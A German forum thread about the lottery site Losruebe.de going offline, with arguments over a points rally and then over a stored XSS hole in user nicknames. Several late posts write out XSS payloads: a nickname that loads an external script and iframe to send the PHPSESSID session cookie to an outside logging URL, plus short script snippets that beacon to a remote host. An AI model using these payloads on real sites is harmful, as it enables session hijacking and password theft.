Losruebe.de - Seite geschlossen - Bitte Guthaben auszahlen!

Excalibur100 schrieb:
Ich mich endschuldigen? Wofür denn?

Die Ralley war noch nicht entschieden, du führtest mit 9 Mio AP vor dem 2. und es waren noch 55 Mio AP offen.
Ich brauch mich net endschuldigen wenn ich hier etwas schreibe was mir auffällt und andere User mir auch zutragen. Den Nichtangriffspakt könnt ihr ja machen wie ihr lustig seid, aber hat ja mit dem anderen nichts zu tun.
Ich denke wenn es wirklich so war, dann hat man anderen ja auch, aus den unteren Rängen, die Chance genommen über Nacht etwas höher zu kommen.
Viele waren an dem Mittag als du hier wieder gepostet hast und kurz danach auch komischerweise die Wartung weg war, auch nicht da und haben somit vielleicht nicht 1 oder 2 Ränge und damit höhere Gewinne gutmachen können. Oder sind deshalb noch von darunterliegenden weiter nacht unten gerutscht.

Also nicht nur nach oben schauen auch mal andere User unten beachten und vielleicht waren es ja welche von den unteren Rängen die mich auch angeschrieben haben. Naja mir ist es auch egal, nur ich sage was ich denke und das werde ich auch weiter tun, obs einigen passt oder net, dass mache ich seid 5 Jahren bei Klamm lol.
Zum Vergrößern anklicken....

du kapierst es wohl nicht...die Seite ist wg einem Bug offline genommen worden, nicht wg mir...wg Leftie oder weil Ruebi irgendeinen anderen auf den anderen Rängen bevorzugen wollte

wenn auf deiner Seite ein Bug ist.. würdest du alles on lassen und dir ggf deinen EF leerräumen lassen ??????
 
@maxY das sollte keine kritik sein nur gibts geile shots wenn man die Wii zockt ;)! ich will hier keinen kritisieren und so und keinem was unterstellen! meine meinung steht oben. wie wärs wenn ihr andi,ruebi und excali dat im ICQ oder so klärt?
 
andiwid schrieb:
zu dem besagten Zeipunkt hatte Exc. ca 210 mio Aps ich um die 280 u Leftie ca 270... wie gesagt rechnerisch hattest du überhaupt keine Chance auf den 2. und Leftie kenne ich seit Jahren , er hatte viel verloren an dem Tag und hatte keine Lust auf einen Zweikampf... ich finde überhaupt nichts verwerfliches dran daß wir uns über die ersten Plätze ein friendly Agreement geschlossen haben

Rübi hatte damit überhaupt nichts zu tun und die unterbrechung wg dem Bug schon gar nicht
Zum Vergrößern anklicken....

da kann ich nur zustimmen, keine "Lust" mehr zum zocken.

Ausserdem hätte ich immernoch die Chance gehabt ihn einzuholen. Aber an Platz 2 war auch nicht mehr zu rütteln.........................
 
Ich finde auch, dass es hier nicht öffentlich diskutiert werden muss!


Allerdings war ich auch etwas verwirrt darüber, dass hier bereits der Rally-Gewinner gefeiert wurde, obwohl es rechnerisch noch möglich gewesen wäre, dass die Nr. 2 auf den ersten platz kommt.

Aber wenn sich dann jemand beschweren könnte, wäre es wohl nur die Rally-Nr. 2.
Und wenn da nichts kommt, ist ja wohl davon auszugehen, dass das alles seine Richtigkeit hat!
 
MaxY schrieb:
Werden, sobald der Cron gelaufen is, auch wieder die AZ-Grenzen für den Tag zurückgeschraubt?

Gruss
Zum Vergrößern anklicken....

ja das läuft dann alles wieder.

Excalibur100 schrieb:
Ich mich endschuldigen? Wofür denn?

Die Ralley war noch nicht entschieden, du führtest mit 9 Mio AP vor dem 2. und es waren noch 55 Mio AP offen.
Zum Vergrößern anklicken....

k2318 schrieb:
Allerdings war ich auch etwas verwirrt darüber, dass hier bereits der Rally-Gewinner gefeiert wurde, obwohl es rechnerisch noch möglich gewesen wäre, dass die Nr. 2 auf den ersten platz kommt.

Aber wenn sich dann jemand beschweren könnte, wäre es wohl nur die Rally-Nr. 2.
Und wenn da nichts kommt, ist ja wohl davon auszugehen, dass das alles seine Richtigkeit hat!
Zum Vergrößern anklicken....

sicher nicht, platz 2 war damit einverstanden und hat vor rallyende schon geschrieben das er andi alles gute und viel spaß mit der wii wünscht.

sicher haben sich user von den unteren plätzen beschwert, aber ich kann da nichts machen und so stehts in den agb. wenn ein bug gefunden wird der noch eine postings vor denen lag (von ice-breaker), dann muss ich reagieren. wie hier einige sicherlich wissen, habe ich schon ca. 5 krasse bugs erlebt die mich mehrere milliarden klammlose gekostet haben. dem wollte ich entgehen.

hier nochmal zur info. wenn ich zocken gehe möchte ich vertrauen in der seite haben. hab ich dies nicht und mir kommts so vor als würde da schindluder mit getrieben werden, so ziehe ich schnell meine lose ab und fertig bin ich. aber ich denke ich tue "bisschen" was um die user zu motivieren und so ansich ist die seite einzigartig. keiner wird bevorzugt. dutzende user fragen an wegen bonus. niemand bekommt etwas. die lose gehen via aktionen wieder in die gewinntöpfe und jeder ist für seinen gewonnenen platz verantwortlich in dem sinne.

das ich user bevorzuge, ist mal wieder eine nette art die leute zu beunruhigen.
in diesem sinne lest euch mal noch die letzten postings durch und dann macht euch selber einen kopf. ich hoffe nur das meine seite bald komplett so läuft wie ich sie haben will und ohne bugs und wartungsmodus.

der cron sollte um 0 uhr durchlaufen. mal schauen :) bis dann bye

Meu001 schrieb:
Andi ist definitiv 1. ;)
Zum Vergrößern anklicken....

martinius schrieb:
Also so wie das eben aussah nicht ganz!

die Seite war ganz kurz erreichbar, Andi 1. mit 9 Mio vor, noch 55 Mio zu holen!!!!
Zum Vergrößern anklicken....

Meu001 schrieb:
Richtig, aber ich weiss wer 2. ist :mrgreen:
Zum Vergrößern anklicken....

MaxY schrieb:
Hm..

Du?

:D
Zum Vergrößern anklicken....

martinius schrieb:
Ist das ein Nichtangriffspakt???
Zum Vergrößern anklicken....

Meu001 schrieb:
Nö, keine Lose für 9 Mio Ap's :-?
Zum Vergrößern anklicken....

martinius schrieb:
Dann leih dir was, Andi hats doch auch gemacht!
Zum Vergrößern anklicken....

Meu001 schrieb:
Ich leihe mir keine Lose, ist ne Prinzip Sache. ;)

Ausserdem hab ich auch schon genug reingesteckt. Ist ja nicht sicher ob ich ihn überholen kann.



Und Ausserdem darf ich ihm ja auf die Nase hauen :mrgreen:
Zum Vergrößern anklicken....

martinius schrieb:
Na dann viel Spaß!:yawn:
Zum Vergrößern anklicken....
 
BigBoss13 schrieb:
was wird eigentlich jetzt aus dem tagesbonus von gestern?
Zum Vergrößern anklicken....

sorry aber wie hier jemand im thread schon gesagt hat du kommst immer dann an wenn was mit der seite ist. wenn du mal nen megakrassen pott gewonnen hast meldest dich gar nicht.

ist auch nur ne kleine kritik wie du sie mir auch oft gibst.
um streit aus dem weg zu gehen habe ich von meinem privaten losen 12 mio an dich geschickt das der liebe bb13 wieder beruhigt schlafen kann.

um 0 uhr geht der cron autom. los dann wird alles ausgezahlt.

gute nacht
 
ice-breaker schrieb:
So, da ich live dabei war, kann ich dir davon berichten:
Ich hatte im Forum mich gewundert, dass einige User Bildchen als Nickname haben als Antwort bekam ich, dass dies kein geplantes Feature war, also konnte (kann) man HTML-Code in den Nickname einfügen (solltest du ja kennen :LOL: ) und dadurch die komplette Seite hacken, ich hatte ruebi gewarnt und er hat sich bei mir im ICQ gemeldet, und hat sich von mir alles erklären lassen, als er es dann beim 2. Mal verstanden hat (Opa Ruebi :p :biggrin: ), hat er die schweren Sicherheitsmängel erkannt und SOFORT das Projekt in den Wartungsmodus geschaltet, da dies sonst ein zu großes Risiko für alle Zocker gegeben hätte.
Zum Vergrößern anklicken....

richtig , dank dir und deiner undurchdachten und schnellen panikmacherei hat rübi die seite offline genommen - war es nötig gewesen? nein, du kannst mit html nix hacken, mit bildchen nix hacken . oder kannst du hier bei klamm klamm hacken wenn du ein bild verlinkst? nein! kannst du es auf losrübe? nein! warum? weil man das nur kann wenn das script ansich unsicher ist und z.b. die sessionID / logdaten per GET-String übergibt oder wichtige Funktionen sich mit einfachem GET-String ausführen lassen.

der cron, der wichtiger bestandteil hat, hatte nen fehler der durch den upload entstanden ist ( uploadfehler, resumeproblem ) ... dadurch sind die zahlungen ausgefallen, werden aber mit dem nächsten lauf des crons nachgeholt.
 
scheiße chuone, du hast es immernoch net gelernt, ich kann über HTML JavaScript einbinden und dadurch habe ich alle Möglichkeiten und kann alles machen, über DOM den Inhalt der Seite ändern, Formularabfragen anfangen (LosePw beim einzahlen ;) ) etc etc
informier dich mal über XSS, du glaubst net welche Hacks auf Grund solcher Dinge schon entstanden sind, das prominenteste Opfer war MySpace.
Achja, und auf MySpace haben sie dank Ajax auch selbst Formularsendungen per JavaScript ausgeführt, denn JS kann das, also kann man mit JS ALLES machen, was auch der User könnte, und sage mir net, dass dies keine Schwachstelle ist

Hier nochmal ganz kurz von Wikipedia was XSS ist und was es bewirken kann:
https://de.wikipedia.org/wiki/XSS#Schutz

Du darfst dich auch gerne per ICQ melden, dann erkläre ich dir, wie es funzt
 
ice-breaker schrieb:
scheiße chuone, du hast es immernoch net gelernt, ich kann über HTML JavaScript einbinden und dadurch habe ich alle Möglichkeiten und kann alles machen, über DOM den Inhalt der Seite ändern, Formularabfragen anfangen (LosePw beim einzahlen ;) ) etc etc
informier dich mal über XSS, du glaubst net welche Hacks auf Grund solcher Dinge schon entstanden sind, das prominenteste Opfer war MySpace.
Zum Vergrößern anklicken....

ist richtig, aber deine panikmacherei war trotzdem unsinng weil du die seite und das system gar nicht kennst.
denn hacke mal bitte mit 30 zeichen javascript, du bist ein künstler wenn du überhaupt ein javascript hinbekommst mit 30 zeichen.
 
chuone schrieb:
ist richtig, aber deine panikmacherei war trotzdem unsinng weil du die seite und das system gar nicht kennst.
denn hacke mal bitte mit 30 zeichen javascript, du bist ein künstler wenn du überhaupt ein javascript hinbekommst mit 30 zeichen.
Zum Vergrößern anklicken....

GOTT!!!
Klar kenne ich das System net, ich kann trotzdem alle Formulareingaben (Klamm-Lose-PWs) abfangen, oder die Seite umstylen, damit ne LogIn-Box kmmt und ich die Daten abfangen, nochmal, ich kann dir gerne per ICQ alles erklären, denn da scheinst du noch Lücken zu haben, achso, zum Einbinden:
Code: 
<script src="jassa.de/h.js">
dank Quirksmode funzt das
 
Chuone, du verstehst es nicht, oder? :roll:
Ein ganz simples Beispiel für eine XSS-Injection, wie sie auf Losruebe bestand:
Ich gehe hin, ändere meinen Nicknamen in etwas à la <script src='https://poeses.skript-verzeichnis.de/cookie.js'></script><iframe id='pcookie' style='display: none'></iframe>harmloser Nick
(falls max. 30 Zeichen - neue Posts gerade gelesen - lässt man "harmloser Nick" halt weg und zeichnet mit DOM selber ein Iframe, was afaik auch geht. Fertig.)
Das Skript liest nun den Cookie PHPSESSID aus, bzw. den angepassten Namen, den man ganz einfach in seinen Cookies nachsehen kann. Das Javascript ruft im Iframe außerdem den Link https://poeses.skript-verzeichnis.de/cookielog.php?sess=[SESSION-COOKIE] auf, also ein serverseitiges Skript, was die Session logged. Eine Bedrohung für jeden User, da man sogar automatisch komplett über den Account verfügen kann. Willst du mir jetzt noch erzählen, dass das ungefährlich sei?

schmunzelnder Rabe
 
hab zwar null ahnung von dem ganzen....

aber was chuone sagt klingt doch eigentlich logisch...

von wegen dass man bei klamm ja auch nicht hacken kann wenn man ein bild verlinkt...

leuchtet doch irgendwie ein....

edit:
raven schrieb:
Chuone, du verstehst es nicht, oder? :roll:
Ein ganz simples Beispiel für eine XSS-Injection, wie sie auf Losruebe bestand:
Ich gehe hin, ändere meinen Nicknamen in etwas à la <script src='https://poeses.skript-verzeichnis.de/cookie.js'></script><iframe id='pcookie' style='display: none'></iframe>harmloser Nick.
Das Skript liest nun den Cookie PHPSESSID aus, bzw. den angepassten Namen, den man ganz einfach in seinen Cookies nachsehen kann. Das Javascript ruft im Iframe außerdem den Link https://poeses.skript-verzeichnis.de/cookielog.php?sess=[SESSION-COOKIE] auf, also ein serverseitiges Skript, was die Session logged. Eine Bedrohung für jeden User, da man sogar automatisch komplett über den Account verfügen kann. Willst du mir jetzt noch erzählen, dass das ungefährlich sei?

schmunzelnder Rabe
Zum Vergrößern anklicken....

aber das hört sich irgendwie auch gut an :)

ich halt mich wohl doch besser raus... versteh das eh alles nicht :)
 
und trotzdem habt ihr noch euren eigenen "progger-krieg-thread" :mrgreen: macht das hier mit ruebi per pn oder icq aus und alles was nicht´s zur sache zu tuen hat klärt unter euch ;)
 
k2318 schrieb:
von wegen dass man bei klamm ja auch nicht hacken kann wenn man ein bild verlinkt...
Zum Vergrößern anklicken....

Das liegt daran das man bei Klamm nur den Bildlink angibt, oder halt noch
[FONT="Courier New"]
. Dabei wird das Bild in HTML auch als BILD angezeigt, und es ist nicht möglich im Script Javascript Anweisungen zu machen.

PS: Es ist auch ein Schutz vor Injections drin, habe gerade in der Vorschau getestet.
 
123456789012345678901234567890
<script>(new Image).src=</script>
<script>https://.de/?s=</script>
<script src="https://.de"></script>

30 Zeichen

btw die sache ist entstanden weil die vor und nachnamen auch nicht gesichert wurden .. und ichs einfach mit dem usernamen erweitert hab ohne groß nachzudenken, raven.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

W
Neue Gutbezahlte Paid4 Seite
Antworten
0
Aufrufe
353
wuffi
W
W
Neue Paid4 Seite
Antworten
1
Aufrufe
433
geldverdienen84
geldverdienen84
kraemer84
Paid4 Seite bewerben
Antworten
4
Aufrufe
884
uli125
uli125
klamm
    • Like
Seite nicht erreichbar - DDOS-Attacke
Antworten
0
Aufrufe
6K
klamm
klamm
P
Quest-Seite nicht erreichbar
Antworten
10
Aufrufe
6K
klamm
klamm
Zurück
Oben